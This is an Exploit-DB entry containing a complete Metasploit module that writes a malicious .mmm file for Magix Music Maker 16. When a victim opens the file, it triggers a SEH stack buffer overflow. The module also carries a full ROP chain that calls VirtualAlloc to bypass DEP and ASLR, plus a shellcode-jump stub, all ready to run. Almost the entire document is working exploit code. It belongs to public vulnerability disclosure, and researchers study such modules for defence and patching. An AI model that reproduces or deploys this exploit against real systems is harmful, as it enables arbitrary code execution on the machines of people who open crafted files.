Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Without EggHunter) (Metasploit)

EDB-ID:

17329

CVE:





Platform:

Windows

Date:

2011-05-27


---
My version of exploit...
Looks like bug the same as in:
http://www.exploit-db.com/exploits/17313/

My exploit does not use egg-hunter,  so it must be faster, but i have limited size for payload -
750 bytes 8) 
Speed Vs Size...
---
# Title: Magix Musik Maker 16
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: 72455
# Author: Alexey Sintsov
# Published: 2011-05-22
# Verified: 
# Download N/A

##
# $Id: musick_maker16.rb 12364 2011-05-03 07:53:58Z aaa $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT
  

 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Musick Maker 16, Stack Buffer Overflow',
            'Description'    => %q{
                    This module exploits a stack buffer overflow in Musick Maker 16
                When opening a malicious .MMM file in Music Maker, a stack buffer occurs,
                resulting in arbitrary code execution via SEH.
                This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. LTKRN14n.dll and LTDIS14n.dll used for ROP.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Alexey Sintsov',     

                ],
            'Version'        => '$Revision: 12364 $',
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
		     'BadChars' => "\x00",
                     'DisableNops' => 'True',
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)',
                        {
			    'Ret'    => 0x20012026, # ADD ESP,4F8 # RETN 4 
			    'Size'   => 750
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'May 02 2011',
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [ true, 'The output file name.', 'msf.mmm']),

            ], self.class)
    end
    
def exploit
		
	badchars = target['BadChars']
	
 
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    print_status("Preparing payload")
	
	aaa_header="\x52\x49\x46\x46\xE6\x9D\x06\x00\x53\x45\x4B\x44\x53\x56\x49\x50"+
	           "\x10\x07\x00\x00\x9B\x5B\x6E\x00\x00\x00\x00\x00\x11\x00\x00\x00"+
			   "\x08\x00\x00\x00\x44\xAC\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00"+
			   "\x00\x00\x39\x40\x00\x00\xF0\x42\x00\x00\x00\x00\xBD\x04\xEF\xFE"+
			   "\x00\x00\x01\x00\x00\x00\x10\x00\x06\x00\x00\x00\x00\x00\x10\x00"+
			   "\x06\x00\x00\x00\x3F\x00\x00\x00\x28\x00\x00\x00\x04\x00\x04\x00"+
			   "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
			   "\xF3\x8E\x32\x01\xD0\x02\x00\x00\x40\x02\x00\x00\x55\x55\x55\x55"+
			   "\x55\x55\xF5\x3F\x10\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF"+
			   "\xFF\xFF\xFF\xFF"

	aaa_list="\x4C\x49\x53\x54\x04\x25\x02\x00\x70\x68\x79\x73\x66\x69\x6C\x65\xF8\x08"
	
    rop_pivot =
	[
		0x20012026, # ADD ESP,4F8 # RETN 4 
	].pack("V*")
	
    rop_nop =
	[
		0x1FF727C6, # RETN
	].pack("V*")
	
	rop_jmp =
	[
		0x2001DD16, # ADD ESP, 40 # RETN
	].pack("V*")
	
	rop_gadgets2 =
	[
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN 
		0x1FF727C5,  # POP ECX # RETN				//  ECX = FFFFFFFF
		0xffffffff,
		0x20048546,  # ADC ECX,EBP # RETN           // ECX - saved stack
		0x1FFA82EF,  # POP EAX # RETN
		0x1FFAF154,  #  ----+               	// [EAX+C] will point on VA
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN  	// now [EBP+C] will point on VA
		0x1FFA817E,  # MOV EAX,DWORD PTR SS:[EBP+C] # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C 
		0xAAAAAAAA,
		0xAAAAAAAA,
		0xAAAAAAAA,
		0xAAAAAAAA,
		0x1FFFB8D9,   # XCHG EAX,EBP # RETN
		0xBBBBBBBB,
		0xBBBBBBBB,
		0xBBBBBBBB,
		0x1FF72620,   # MOV EAX,ECX # POP EBX # RETN
		0xAAAAAAAA,
		0x1FFFB8D9,   # XCHG EAX,EBP # RETN      // EBP - saved stack pointer
		0x2004A8C1,   # CALL EAX  # RETN        // call VirtAlloc
		0x31313131,   # // param 1
		0x32323232,   # // param 2
		0x33333333,   # // param 3
		0x34343434,   # // param 4
		0x2001215B,  # PUSH ESP # RETN 4
	].pack("V*")

    rop_gadgets =
        [
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN           		 //	Pointer in EAX
		0x1FF95F45,  # PUSH EAX # POP ESI # RETN 8   		 //	Pointer in ESI an EAX
		0x1FFA82EF,  # POP EAX # RETN 
		0x11111111,  #     ^
		0x22222222,  #     |  
		0xFFFFFc74,  # 	---+	
		0x200263f5,  # NEG EAX  # RETN               		 //	EAX = OFFSET 
		0x1FF74212,  # ADD EAX,ESI # POP ESI # RETN  		 //	pointer in stack on our HEAP
		0x33333333,
		0x1FF939F2,  # MOV EAX,DWORD PTR DS:[EAX+90] # RETN 4// EAX -> POINTER+OFFSET --- here are our params in HEAP
		0x1FF95F45,  # PUSH EAX # POP ESI # RETN 8  		 // EAX and ESI = POINTER+OFFSET --- here are our params in HEAP
		0x44444444,
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN           		 //	EBP = Pointer as param 1
		0x44444444,
		0x55555555,
			
		0x1FF727C5,  # POP ECX # RETN				  		 //  ECX = ffffff10
		0xffffff10,
		0x20048546,  # ADC ECX,EBP # RETN            		//  ECX = Pointer on stack - as param 1
		0x2003C7AD,  # MOV EAX,ESI # POP ESI # RETN 		//	EAX=PARAMS POINTER
		0x66666666,
		0x1FF95F45,  # PUSH EAX # POP ESI # RETN 8  		// 	resave in ESI
		0x1FF891C4,  # MOV DWORD PTR DS:[EAX+4],ECX # RETN 	// WRITE PARAM 1 - pointer on stack
		0x77777777, 
		0x88888888,
			
		0x1FFA883A,  # XOR EAX,EAX # RETN 
		0x1FF7519F,  # ADD AL,40 # RETN    // EAX=40
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN            		//	EBP = 40
		0x1FF727C5,  # POP ECX # RETN						//  ECX = ffffffd0
		0xffffffd0,
		0x20048546,  # ADC ECX,EBP # RETN          			//  ECX = 10
		0x2003C7AD,  # MOV EAX,ESI # POP ESI # RETN 		//	EAX=PARAMS POINTER
		0x99999999,
		0x1FF95F45,  # PUSH EAX # POP ESI # RETN 8  		// 	resave in ESI
		0x1FF9EAF7,  # MOV DWORD PTR DS:[EAX+8],ECX # RETN 	// WRITE PARAM 2 - size(10)
		0xaaaaaaaa,
		0xbbbbbbbb,
			
		0x1FFA82EF,  # POP EAX # RETN            			// EAX = FFFFEFFF
		0xffffefff,
		0x200263f5,  # NEG EAX  # RETN          			// EAX=1001 (cos 1000 with null bytes) 
		0x1FFA0231,  # DEC EAX # RETN                       // EAX=1000 
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN           		 //	EBP = 1000
		0x1FF727C5,  # POP ECX # RETN						//  ECX = FFFFFFFF
		0xffffffff,
		0x20048546,  # ADC ECX,EBP # RETN         			 //  ECX = 1000 - MEM_COMMIT
		0x2003C7AD,  # MOV EAX,ESI # POP ESI # RETN 		//	EAX=PARAMS POINTER
		0xcccccccc,
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF751A0,  # INC EAX # RETN
		0x1FF95F45,  # PUSH EAX # POP ESI # RETN 8 			 // resave in ESI
		0x1FF891C4,  # MOV DWORD PTR DS:[EAX+4],ECX # RETN 	// 	WRITE PARAM 3 - MEM_COMMIT
		0xdddddddd,
		0xdddddddd,
		
		0x1FF727C5,  # POP ECX # RETN						//  ECX = ffffffFF
		0xffffffff,
		0x20033FB9,  # INC ECX # ADD AL,3 # RETN 			// 	ECX=0
		0x1FFA883A,  # XOR EAX,EAX # RETN 
		0x1FF7519F,  # ADD AL,40 # RETN   					 // EAX=40
		0x1FFFB8D9,  # XCHG EAX,EBP # RETN           		 //	EBP = 40
		0x20048546,  # ADC ECX,EBP # RETN          			//  ECX = 40
		0x2003C7AD,  # MOV EAX,ESI # POP ESI # RETN 		//	EAX=PARAMS POINTER
		0xeeeeeeee,
		0x1FF9EAF7,  # MOV DWORD PTR DS:[EAX+8],ECX # RETN 	//	 WRITE PARAM 4 - WRITE_EXECUTE
		0x1FF727C5,  # POP ECX # RETN 
		0xFFFFFFAC,  # -84 -^
		0x1FF75190,  # ADD EAX,ECX # RETN  EAX=EAX-84
		0x2004387F,  # XCHG EAX,ESP # RETN  // New stack pointer in HEAP-------->rop_gadgets2
			
	].pack("V*")
	
	#Jump to shellcode
	shell_jmp="\x87\xe5"+ 	# XCHG ESP, EBP <---- take back stack pointer
	"\x33\xc0"+ 			# XOR EAX, EAX
	"\x04\x40"+ 		  	# ADD AL, 40
	"\x50"+					# PUSH EAX
	"\x33\xc0"+ 			# XOR EAX, EAX		
	"\xb4\x10"+             # MOV AH, 10
	"\x50"+					# PUSH EAX
	"\x8b\xc5"+				# MOV EAX, EBP
	"\x33\xc9"+				# XOR ECX,ECX
	"\xb5\x05"+				# MOV CH, 5
	"\xb1\xee"+				# MOV CL, EE
	"\x2b\xc1"+				# SUB EAX, ECX <--- block with shellcode
	"\x51"+					# PUSH ECX
	"\x50"+					# PUSH EAX
	"\x8b\xf8"+				# MOV EDI, EAX
	"\xb9\x60\xf1\xfa\x1f"+ # MOV ECX, 1FFAF160
	"\xff\x11"+				# CALL [ECX] -> call kenrnel32.VirtualAlloc(shellcode,0x826,MEM_COMMIT,READWRITE_EXECUTE)
	"\xff\xe7"  			# JMP EDI -> JMP shellcode

	pivot = [target.ret].pack('V')
       
	shellcode=payload.encoded
       
    nops = make_nops(8)
	
	aaa_data = aaa_header
	aaa_data << "\x00"*1680
	aaa_data << aaa_list
	aaa_data << "\x00"*25
	
	#### This will be in heap, not in the stack
	aaa_data << "C:\\aaa\\"
	aaa_data << shellcode # 7. Shellcode run
	aaa_data << "a"*(target['Size']-shellcode.length)  
	
	aaa_data << "a"*328
	
	aaa_data << "\x00"*16
	
	
	aaa_data << "x"*320
	aaa_data << rop_gadgets2 # 4. call VirtualAlloc, jmp to ESP (5.)
	aaa_data << shell_jmp    # 5. call VA again and JMP to shellcode (6.) 
	aaa_data << "a"*61
	
	#### And this will be in stack!
	aaa_data << rop_jmp*32   # 2. After satck pivot, jump to (3.)
	aaa_data << "a"*16
	aaa_data << [target.ret].pack('V')   # 1. SEH rewrite -> ADD ESP, xxx and we are in (2.) 
	aaa_data << rop_nop*10  # 3. ROP-NOP
	aaa_data << rop_gadgets # 4. ROP programm, calc in HEAP and make new stack  (4.)
	aaa_data << "a"*31337    # truncated
 
        print_status("Writing payload to file, " + aaa_data.length.to_s()+" bytes")
 
	if shellcode.length>target['Size']
		print_status("ERROR, too big payload!")
	else
	    file_create(aaa_data)
	end
    end
end